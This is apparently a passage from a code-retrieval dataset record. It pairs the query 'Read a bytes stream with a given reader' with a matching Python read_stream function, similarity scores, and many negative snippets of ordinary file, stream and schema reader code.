generators.DocumentationStyle, documentation, \"documentation\"\n )\n )", "def docstring_example(name, age, role='manager'):\n print(name, age, role)", "def map_readers(func, *readers):\n\n def reader():\n rs = []\n for r in readers:\n rs.append(r())\n for e in itertools.imap(func, *rs):\n yield e\n\n return reader", "def XCAFDoc_DocumentTool_Set(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)", "def test__get_doc():\n docstring = util._get_doc(\"midgard\")\n assert isinstance(docstring, str) and len(docstring) > 0", "def docstring(func: Callable) -> list[str] | None:\n try:\n lines = func.__doc__.strip().split(\"\\n\") # type: ignore\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def __doc__(self, ???):", "def docs(self):\n self._doc_info = DocumentationURL()\n self._doc_info.show()", "def doc_summary(lines):\n summary = []\n for line in lines:\n stripped = line.strip().lower()\n if (stripped.startswith('to use this normalizer') or\n stripped.startswith('use ``method')):\n continue\n if (line.startswith('Parameters') or line.startswith('Example')\n or line.startswith('.. note::')):\n break\n summary.append(line)\n return summary", "def get_docblocks(self): # type: () -> List[Tuple[str, str]]\n docstring = inspect.getdoc(self)\n result = []\n buffer = OrderedDict()\n\n for path, entry in self._config.items():\n if entry._docstring:\n result.append((docstring, self._config_to_toml(buffer, tomlkit.document())))\n\n docstring = entry._docstring\n buffer = OrderedDict()\n\n buffer[path] = entry\n\n result.append((docstring, self._config_to_toml(buffer, tomlkit.document())))\n return result", "def main():\n parser = argparse.ArgumentParser(\n description='Automatically document the API for a ROS node.')\n parser.add_argument(\n 'nodes',\n metavar=\"node\",\n type=str, nargs='*',\n help='The name of the nodes to document. 
If empty, ' +\n 'all nodes will be documented')\n parser.add_argument(\n '--output-dir',\n type=str,\n default=abspath(curdir),\n help='The directory where documentation should be written')\n parser.add_argument(\n '--proxy-port',\n type=int,\n default=33133,\n help='The port to use for the ROS master proxy server')\n parser.add_argument(\n '--doc-format',\n type=str,\n default=MARKDOWN,\n help=\"The format of the documentation to generate \" +\n \"(%s)\" % \", \".join(SUPPORTED_DOC_FORMATS))\n\n args = parser.parse_args()\n\n # Grab command line arguments\n nodeNames = args.nodes\n outputDir = args.output_dir\n proxyPort = args.proxy_port\n docFormat = args.doc_format.lower()\n\n # Make sure the format is valid\n if docFormat not in SUPPORTED_DOC_FORMATS:\n print \"ERROR: unknown doc-format argument: %s\" % docFormat\n exit(2)\n\n # Ensure that the output directory exists\n if not exists(outputDir):\n print \"ERROR: the output directory does not exist: %s\" % outputDir\n exit(3)\n\n # Make sure the ROS master is running\n try:\n rosgraph.Master('/rostopic').getPid()\n except socket.error:\n print \"ERROR: failed to communicate with the ROS master!\"\n exit(4)\n\n # Create the ROS master proxy node\n masterProxy = RosMasterProxy(nodeNames, port=proxyPort)\n\n try:\n print \"Starting server...\"\n masterProxy.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n\n # Document the information about the node\n print \"Documenting...\"\n masterProxy.document(outputDir, docFormat=docFormat)", "def _print_doc(self, name):\r\n print(self._get_doc(name)) # noqa\r", "def get_doc_string(self) -> str:\n r = \"Undocumented\"\n if self.doc is not None: r = self.doc\n return r", "def Standalone(self):\n ret = libxml2mod.xmlTextReaderStandalone(self._o)\n return ret", "def doc(obj):\n return Documentation.fromObject(obj).first", "def help(*args):\n console_script = ConsoleScript.singleton\n\n if not args:\n # show documentation for parsed group\n yield console_script.parser.group.doc\n else:\n # show command documentation if possible\n if args[0] in console_script:\n yield console_script[args[0]].doc\n else:\n importable = Importable.factory(args[0])\n if importable.target and not importable.is_module:\n yield importable.doc\n elif importable.module:\n if not importable.target:\n yield f'{RED}Cannot import {args[0]}{RESET}'\n yield ' '.join([\n YELLOW,\n 'Showing help for',\n importable.module.__name__ + RESET\n ])\n yield BaseGroup.factory(importable.module.__name__).doc", "def do_docs(self, path):\n print(\"scaraping documentation\")\n for p in path.glob(\"**/*\"):\n if p.is_file():\n parts = p.relative_to(path).parts\n if parts[-1].endswith(\"rst\"):\n data = tsparse(p.read_bytes())\n blob = DocBlob()\n blob.arbitrary = data\n blob.content = {}\n\n blob.ordered_sections = []\n blob.item_file = None\n blob.item_line = None\n blob.item_type = None\n blob.aliases = []\n blob.example_section_data = Section()\n blob.see_also = []\n blob.signature = None\n blob.references = None\n blob.refs = []\n\n self.docs[parts] = json.dumps(blob.to_json(), indent=2)\n else:\n pass\n # data = p.read_bytes()" ]
[ "0.6139211", "0.5529351", "0.5529351", "0.5529351", "0.5385095", "0.53439957", "0.52958757", "0.5215697", "0.5117727", "0.49581614", "0.48913068", "0.4863882", "0.48443574", "0.48011702", "0.47767526", "0.47586027", "0.47446275", "0.4685375", "0.46740708", "0.4643249", "0.46230683", "0.46218795", "0.46174067", "0.4599343", "0.45940423", "0.4585905", "0.4578101", "0.45744273", "0.45646197", "0.45554435", "0.45423672", "0.45349377", "0.45341086", "0.45293927", "0.45215365", "0.45209196", "0.451842", "0.4505307", "0.45045516", "0.4487047", "0.44858012", "0.44592923", "0.4457363", "0.4453356", "0.44464195", "0.44438043", "0.44219062", "0.44148767", "0.44121125", "0.44120452", "0.43969417", "0.43968582", "0.43968582", "0.43878096", "0.43817967", "0.43715546", "0.43703216", "0.43620768", "0.4314396", "0.43136477", "0.4299846", "0.42991078", "0.42959926", "0.42930102", "0.42911634", "0.42860177", "0.42856792", "0.42797607", "0.42753145", "0.42720574", "0.42715117", "0.4255769", "0.4254046", "0.42538038", "0.42492002", "0.42488486", "0.4247641", "0.4247497", "0.42330313", "0.4229222", "0.42289084", "0.4228169", "0.4220502", "0.42165104", "0.42122507", "0.4209693", "0.42052147", "0.42002892", "0.4197405", "0.41942662", "0.41941658", "0.4188567", "0.41831222", "0.41626266", "0.4161027", "0.4159943", "0.4158329", "0.415762", "0.41520885", "0.41490442" ]
0.67184293
0
Read a bytes stream with a given reader
If the reader is not specified, an attempt to guess at an appropriate reader is made.
A NoReaderFound error is raised if no such appropriate reader is found.
def read_stream(
    input_stream: IO[bytes], reader_name: Optional[str] = None, **reader_args: Any
) -> Reader:
    if reader_name is None:
        reader_name = identify(input_stream)

    reader = plugins.call(
        package_name=__name__,
        plugin_name=reader_name,
        input_stream=input_stream,
        **reader_args,
    )
    reader.read()
    return reader
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def read_file(\n file_path: Union[str, pathlib.Path],\n reader_name: Optional[str] = None,\n **reader_args: Any,\n) -> Reader:\n with open(file_path, mode=\"rb\") as input_stream:\n return read_stream(input_stream, reader_name)", "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def read_bytes(stream, writer_schema=None, reader_schema=None): # noqa\n size = read_long(stream)\n if reader_schema == 'string':\n # Schema Resolution: promote to unicode string\n return stream.read(size).decode('utf-8')\n else:\n return stream.read(size)", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def reader_for_streaming(io):\n if not hasattr(io, 'read'):\n raise TypeError('{0} must be an opened file.'.format(io))\n if hasattr(io, 'encoding'):\n raise TypeError('{0} must be opened in binary mode'.format(io))\n return reader.Reader.read_headers(io)", "def read(self, source, sourcename=None, postcheck=True, strict=True):\n if isinstance(source, str):\n with open(source, mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or source,\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, pathlib.Path):\n with source.open(mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or str(source),\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, io.BufferedIOBase):\n return self.readTextStream(\n io.TextIOWrapper(source),\n sourcename,\n postcheck=postcheck,\n strict=strict,\n )\n elif not isinstance(source, io.TextIOBase):\n raise TypeError(\n \"Source must be file name (str or pathlib.Path) or \"\n \"readable stream of text data. 
Got {}\".format(type(source))\n )\n return self.readTextStream(\n source, sourcename, postcheck=postcheck, strict=strict\n )", "def schemaless_reader(stream, schema):\n acquaint_schema(schema)\n return read_data(stream, schema)", "async def readuntil_or_exc(reader, separator = b'\\n', timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.readuntil(separator), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def get_stream_reader(fh, tmp_dir):\n magic_dict = {\n b\"\\x1f\\x8b\\x08\": _get_stream_readers_for_gzip,\n b\"\\x42\\x5a\\x68\": _get_stream_readers_for_bz2,\n b\"\\x50\\x4b\\x03\\x04\": _get_stream_readers_for_zip,\n }\n start_of_file = fh.read(CHUNK_SIZE)\n try:\n fh.seek(0)\n except UnsupportedOperation: # This happens if fh has been created by urlopen\n fh = _download_file(start_of_file, fh)\n try: # Check if file is tar file\n if tarfile.open(fileobj=StringIO(start_of_file)):\n return _get_stream_readers_for_tar(fh, tmp_dir)\n except tarfile.ReadError:\n pass\n for k, v in magic_dict.items():\n if start_of_file.startswith(k):\n return v(fh, tmp_dir)\n return [fh]", "def _ReadStream(self, stream_name):\n file_object = self._OpenStream(stream_name)\n if not file_object:\n return b''\n\n try:\n data = file_object.read()\n finally:\n file_object.close()\n\n return data", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def read(ios):\n assert(isinstance(ios, io.IOBase))\n return Reader(ios).read()", "def do_read(fp, decoder):\r\n # read header\r\n header = fp.read(RecordIO.RECORD_HEADER_SIZE)\r\n if len(header) == 0:\r\n log.debug(\"%s has no data (current offset = %d)\" % (fp.name, fp.tell()))\r\n # Reset EOF (appears to be only necessary on OS X)\r\n fp.seek(fp.tell())\r\n return None\r\n elif len(header) != RecordIO.RECORD_HEADER_SIZE:\r\n raise RecordIO.PrematureEndOfStream(\r\n \"Expected %d bytes in header, got %d\" % (RecordIO.RECORD_HEADER_SIZE, len(header)))\r\n blob_len = struct.unpack('>L', header)[0]\r\n if blob_len > RecordIO.MAXIMUM_RECORD_SIZE:\r\n raise RecordIO.RecordSizeExceeded(\"Record exceeds maximum allowable size\")\r\n\r\n # read frame\r\n read_blob = fp.read(blob_len)\r\n if len(read_blob) != blob_len:\r\n raise RecordIO.PrematureEndOfStream(\r\n 'Expected %d bytes in frame, got %d' % (blob_len, len(read_blob)))\r\n return decoder.decode(read_blob)", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = 
os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "async def read_stream(self, stream_read_request_body: StreamReadRequestBody = Body(None, description=\"\")) -> StreamRead:\n adapter = self._create_low_code_adapter(manifest=stream_read_request_body.manifest)\n schema_inferrer = SchemaInferrer()\n\n if stream_read_request_body.record_limit is None:\n record_limit = self.max_record_limit\n else:\n record_limit = min(stream_read_request_body.record_limit, self.max_record_limit)\n\n slices = []\n log_messages = []\n try:\n for message_group in self._get_message_groups(\n adapter.read_stream(stream_read_request_body.stream, stream_read_request_body.config),\n schema_inferrer,\n record_limit,\n ):\n if isinstance(message_group, AirbyteLogMessage):\n log_messages.append({\"message\": message_group.message})\n else:\n slices.append(message_group)\n except Exception as error:\n # TODO: We're temporarily using FastAPI's default exception model. Ideally we should use exceptions defined in the OpenAPI spec\n self.logger.error(f\"Could not perform read with with error: {error.args[0]} - {self._get_stacktrace_as_string(error)}\")\n raise HTTPException(\n status_code=400,\n detail=f\"Could not perform read with with error: {error.args[0]}\",\n )\n\n return StreamRead(\n logs=log_messages,\n slices=slices,\n test_read_limit_reached=self._has_reached_limit(slices),\n inferred_schema=schema_inferrer.get_stream_schema(stream_read_request_body.stream)\n )", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def read_data(stream, writer_schema, reader_schema=None):\n if isinstance(writer_schema, dict):\n record_type = writer_schema['type']\n elif isinstance(writer_schema, list):\n record_type = 'union'\n else:\n record_type = writer_schema\n\n if reader_schema and record_type in AVRO_TYPES:\n if not match_schemas(writer_schema, reader_schema):\n raise SchemaResolutionError(\n 'Schema mismatch: %s does not match %s'\n % (writer_schema, reader_schema)\n )\n\n try:\n return READERS[record_type](stream, writer_schema, reader_schema)\n except SchemaResolutionError:\n raise\n except Exception as exc:\n raise ReadError(\n 'Failed to read %r type' % record_type, exc\n )", "def read_string(stream, writer_schema=None, reader_schema=None): # noqa\n 
size = read_long(stream)\n if reader_schema == 'bytes':\n # Schema Resolution: promote to byte string\n return stream.read(size)\n else:\n return stream.read(size).decode('utf-8')", "def checked_read(in_stream, length, allow_eof=False):\n\n bytes = in_stream.read(length)\n if allow_eof and bytes == '':\n return bytes\n if len(bytes) != length:\n raise IOError(MSG_INCOMPLETE_READ)\n return bytes", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def read_stream(schema, stream, *, buffer_size=io.DEFAULT_BUFFER_SIZE):\n reader = _lancaster.Reader(schema)\n buf = stream.read(buffer_size)\n remainder = b''\n while len(buf) > 0:\n values, n = reader.read_seq(buf)\n yield from values\n remainder = buf[n:]\n buf = stream.read(buffer_size)\n if len(buf) > 0 and len(remainder) > 0:\n ba = bytearray()\n ba.extend(remainder)\n ba.extend(buf)\n buf = memoryview(ba).tobytes()\n if len(remainder) > 0:\n raise EOFError('{} bytes remaining but could not continue reading '\n 'from stream'.format(len(remainder)))", "def try_read(self):\r\n pos = self._fp.tell()\r\n try:\r\n return self.read()\r\n except RecordIO.PrematureEndOfStream as e:\r\n log.debug('Got premature end of stream [%s], skipping - %s' % (self._fp.name, e))\r\n self._fp.seek(pos)\r\n return None", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def read_fixed(stream, writer_schema, reader_schema=None):\n return stream.read(writer_schema['size'])", "def read(reader: BitStreamReader, _index: int) -> BitBuffer:\n\n return reader.readBitBuffer()", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def read(self, *args, **kwargs):\n return self.limitedstream.read(*args, **kwargs)", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def read(self) -> Optional[bytes]:", "def read_on(reader, f):\n while True:\n try:\n line = reader(f)\n except StopIteration:\n break\n\n if line is not None:\n yield line", "async def read(self, *, decode: bool = ...) 
-> bytes:\n ...", "def readline(self) -> Optional[bytes]:\n ...", "def load_reader(path):\n if path[-4:] != '.pkl':\n path+='.pkl'\n with open(path,\"r+b\") as f:\n log(\"Loading reader from {}\".format(path))\n r = pickle.load(f)\n return r", "def Read(buf: IO[bytes]) -> Optional[bytes]:\n count_bytes = buf.read(_UINT64.size)\n if not count_bytes:\n return None\n\n try:\n (count,) = _UINT64.unpack(count_bytes)\n except struct.error as error:\n raise ValueError(f\"Incorrect size tag {count_bytes}: {error}\")\n\n # It might happen that we are given file with incorrect format. If the size\n # tag is interpreted as a huge number, reading the buffer will lead to raising\n # an exception, because Python will try to allocate a buffer to read into. If\n # possible, we try to check guard against such situations and provide more\n # informative exception message.\n\n def Error(left: int) -> ValueError:\n message = f\"Malformed input (reading {count} bytes out of {left} available)\"\n return ValueError(message)\n\n if buf.seekable():\n position = buf.tell()\n\n buf.seek(0, os.SEEK_END)\n size = buf.tell()\n\n if count > size - position:\n raise Error(size - position)\n\n buf.seek(position, os.SEEK_SET)\n\n chunk = buf.read(count)\n if len(chunk) != count:\n raise Error(len(chunk))\n\n return chunk", "def Deserializer(stream_or_string, **options):\n if not isinstance(stream_or_string, (bytes, str)):\n stream_or_string = stream_or_string.read()\n if isinstance(stream_or_string, bytes):\n stream_or_string = stream_or_string.decode()\n try:\n objects = json.loads(stream_or_string)\n yield from PythonDeserializer(objects, **options)\n except (GeneratorExit, DeserializationError):\n raise\n except Exception as exc:\n raise DeserializationError() from exc", "def read(self, nbytes: int, /) -> Optional[bytes]:", "def prep_stream_data(data):\n if isinstance(data, (six.string_types, six.binary_type)):\n stream = io.BytesIO(to_bytes(data))\n else:\n stream = data\n\n return InsistentReaderBytesIO(stream)", "def _get_part_reader(self, headers: CIMultiDictProxy[str]) -> Union[MultipartReader, BodyPartReader]:\n ...", "def read(self, nbytes: Optional[int] = None) -> Optional[bytes]:\n ...", "def read_null(stream, writer_schema=None, reader_schema=None):\n return None", "def _get_infile(filepath):\n # type: (Text) -> BinaryIO\n if filepath is None:\n return sys.stdin\n else:\n if not os.path.exists(filepath):\n raise OSError('File does not exist: {}'.format(filepath))\n return open(filepath, 'r')", "def _read_binary(self, filename):\n\t\ttry:\n\t\t\tvalidation.required(filename, 'filename')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t@stack\n\t\tdef do_read(file):\n\t\t\tif os.path.exists(file):\n\t\t\t\tf = open(file, \"rb\")\n\t\t\t\tdata = f.read()\n\t\t\t\tf.close()\n\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\traise errors.APIError(\"File not found: %s\" % file)\n\n\t\td = Deferred()\n\t\td.addCallback(do_read)\n\t\td.addCallback(lambda _: (0, _))\n\t\td.addErrback(lambda _: (-1, _.getErrorMessage()))\n\t\td.callback(filename)\n\t\treturn d", "async def readexactly_or_exc(reader, n, timeout = None):\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.readexactly(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def readfile(input_stream, offset, size):\n input_stream.seek(offset)\n dest = input_stream.read(size)\n if dest:\n return dest", "def 
test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def test_getreader(self):\n reader = codecs.getreader('imap4-utf-7')(BytesIO(b'Hello&AP8-world'))\n self.assertEqual(reader.read(), u'Hello\\xffworld')", "def _ReadSerializerStream(self):\n stream_name = 'serializer.txt'\n if not self._HasStream(stream_name):\n return\n\n serialization_format = self._ReadStream(stream_name)\n if serialization_format != definitions.SERIALIZER_FORMAT_JSON:\n raise ValueError(\n 'Unsupported stored serialization format: {0:s}'.format(\n serialization_format))\n\n return serialization_format", "def test_bio_read_wrong_args(self, bufsize):\n ctx = Context(SSLv23_METHOD)\n conn = Connection(ctx, None)\n with pytest.raises(TypeError):\n conn.bio_read(bufsize)", "def open_input_stream(uri: str) -> BinaryIO:\n parsed = urlparse(uri)\n if parsed.scheme == \"gs\":\n return _gcsfs().open(uri)\n else:\n filesystem, path = fs.FileSystem.from_uri(uri)\n return filesystem.open_input_file(path)", "def read(self, reader: BitStreamReader, index: int) -> typing.Any:\n\n return self._objectCreator(reader, index)", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def _read(self):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n try:\n with self._read_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n data = self._reader.readline(self.MAX_MESSAGE_SIZE)\n # If there weren't a \"\\r\\n\" between the last message\n # and the EOF we would have a false positive here.\n # Luckily there is one.\n if len(data) > 0 and not data.endswith(b\"\\r\\n\"):\n logger.error(\n \"The client sent a message larger than %d bytes (that \"\n \"is MAX_MESSAGE_SIZE). 
Consider raising that value if \"\n \"the message seemed legit.\", self.MAX_MESSAGE_SIZE)\n self.finalize(\"Client misbehaving.\")\n raise IOError(\"Message too long.\")\n except socket.error as error:\n if self.connected:\n logger.warning(\"Failed reading from socket: %s.\", error)\n self.finalize(\"Read failed.\")\n raise error\n else:\n # The client was terminated willingly; its correct termination\n # is handled in disconnect(), so here we can just return.\n return b\"\"\n\n return data", "def _convert_to_fd_or_read_function(fd):\n if is_callable(fd):\n yield fd\n return\n elif isinstance(fd, basestring):\n if fd.endswith('.gz'):\n from ...utils.compat import gzip\n with gzip.GzipFile(fd, 'rb') as real_fd:\n yield real_fd.read\n return\n else:\n with open(fd, 'rb') as real_fd:\n if sys.platform.startswith('win'):\n # On Windows, we can't pass a real file descriptor\n # to the C level, so we pass the read method\n yield real_fd.read\n return\n yield real_fd\n return\n elif hasattr(fd, 'read'):\n assert is_callable(fd.read)\n magic = fd.read(2)\n fd.seek(0)\n if magic == b'\\x1f\\x8b':\n from ...utils.compat import gzip\n fd = gzip.GzipFile(fileobj=fd)\n\n if type(fd.read(0)) == type(u''):\n def make_encoder(reader):\n def read(n):\n return reader(n).encode('utf-8')\n yield make_encoder(fd.read)\n return\n\n if not sys.platform.startswith('win'):\n if IS_PY3K:\n if isinstance(fd, io.FileIO):\n yield fd\n return\n else:\n if isinstance(fd, file):\n yield fd\n return\n\n yield fd.read\n return\n else:\n raise TypeError(\"Can not be coerced to read function\")", "def chunked_reader(name):\n with open(name, \"rb\") as src:\n for chunk in iter(lambda: src.read(4096), b\"\"):\n yield chunk", "def bz2_file_bytes_reader(path):\n return bz2.open(path, 'rb')", "def partial_reader(filename, chunk_size):\n try:\n file = open(filename, 'rb')\n while True:\n chunk = file.read(chunk_size)\n if not chunk:\n return\n yield chunk\n except IOError as e:\n logger.error(\"IOError: %s\" %(str(e)), exc_info=True)\n return", "def unwrap_read(b):\n if not b:\n raise ConnectionResetError(ECONNRESET, os.strerror(ECONNRESET))\n return b", "def _read(fp, offset, size):\n fp.seek(offset)\n return fp.read(size)", "def read(num_bytes):\n # If file cannot be mmap'd (e.g. 
is stdin, or a fifo), fall back\n # to doing an actual read from the file.\n if not can_be_mmapd(fd):\n return fd.read(num_bytes)\n\n bytes_available = max(file_size - offset, 0)\n if bytes_available == 0:\n return b\"\"\n\n return mmap.mmap(fd.fileno(), min(num_bytes, bytes_available), offset=offset, access=mmap.ACCESS_READ)", "def read_union(stream, writer_schema, reader_schema=None):\n index = read_long(stream)\n w_schema = writer_schema[index]\n if reader_schema:\n # Schema Resolution\n r_schemas = (reader_schema if isinstance(reader_schema, list)\n else (reader_schema,))\n for r_schema in r_schemas:\n if match_schemas(w_schema, r_schema):\n return read_data(stream, w_schema, r_schema)\n raise SchemaResolutionError(\n 'Schema mismatch: %s cannot resolve to %s'\n % (writer_schema, reader_schema)\n )\n else:\n return read_data(stream, w_schema)", "def read_blob(blob):\r\n if blob.hexsha != Diff.NULL_HEX_SHA:\r\n return blob.data_stream.read()\r\n else:\r\n with open(blob.path) as fp:\r\n return fp.read()", "def _open_bytesio(stream, *args, **kwargs): # pylint: disable=unused-argument\n yield stream", "def read_record(stream, writer_schema, reader_schema=None):\n record = {}\n if reader_schema is None:\n for field in writer_schema['fields']:\n record[field['name']] = read_data(stream, field['type'])\n else:\n readers_field_dict = dict(\n (f['name'], f) for f in reader_schema['fields']\n )\n for field in writer_schema['fields']:\n readers_field = readers_field_dict.get(field['name'])\n if readers_field:\n record[field['name']] = read_data(\n stream, field['type'], readers_field['type']\n )\n else:\n # should implement skip\n read_data(stream, field['type'], field['type'])\n\n # fill in default values\n if len(readers_field_dict) > len(record):\n writer_fields = set(f['name'] for f in writer_schema['fields'])\n for field_name, field in iteritems(readers_field_dict):\n if field_name not in writer_fields:\n if 'default' in field:\n record[field['name']] = field['default']\n else:\n msg = 'No default value for %s' % field['name']\n raise SchemaResolutionError(msg)\n return record", "def read(self, reader: BitStreamReader, size: int = 0) -> None:\n\n self._rawArray.clear()\n\n if self._isImplicit:\n if not self._arrayTraits.HAS_BITSIZEOF_CONSTANT:\n raise PythonRuntimeException(\"Array: Implicit array elements must have constant bit size!\")\n\n elementSize = self._arrayTraits.bitSizeOf()\n remainingBits = reader.getBufferBitSize() - reader.getBitPosition()\n readSize = remainingBits // elementSize\n for index in range(readSize):\n self._rawArray.append(self._arrayTraits.read(reader, index))\n else:\n if self._isAuto:\n readSize = reader.readVarSize()\n else:\n readSize = size\n\n for index in range(readSize):\n if self._checkOffsetMethod is not None:\n reader.alignTo(8)\n self._checkOffsetMethod(index, reader.getBitPosition())\n self._rawArray.append(self._arrayTraits.read(reader, index))", "def readFromStream(self, streamBuf):\n consumedBytes = 0\n\n try:\n while self.bytesToRead > 0 and len(streamBuf[consumedBytes:]) >= self.bytesToRead:\n if self.readheader:\n self.readheader = False\n self.type, self.bytesToRead = self.readHeader(streamBuf[:self.headerLength])\n consumedBytes = self.headerLength\n else:\n rawdata = streamBuf[consumedBytes:consumedBytes+self.bytesToRead]\n consumedBytes += self.bytesToRead\n self.bytesToRead = 0\n \n self.data = self.readData(rawdata, self.type)\n \n except BaseException as e:\n import traceback\n log.log(2, \"error reading message from stream %s\" % 
str(e))\n log.log(2, traceback.format_exc())\n \n return consumedBytes", "def DataReader(name, data_source=None, start=None, end=None,\n retry_count=3, pause=0.001, session=None, access_key=None):\n if data_source == \"yahoo\":\n return YahooDailyReader(symbols=name, start=start, end=end,\n adjust_price=False, chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"yahoo-actions\":\n return YahooActionReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"yahoo-dividends\":\n return YahooDailyReader(symbols=name, start=start, end=end,\n adjust_price=False, chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session, interval='v').read()\n\n elif data_source == \"google\":\n return GoogleDailyReader(symbols=name, start=start, end=end,\n chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"enigma\":\n return EnigmaReader(datapath=name, api_key=access_key).read()\n\n elif data_source == \"fred\":\n return FredReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"famafrench\":\n return FamaFrenchReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"oecd\":\n return OECDReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"eurostat\":\n return EurostatReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"edgar-index\":\n return EdgarIndexReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"oanda\":\n return 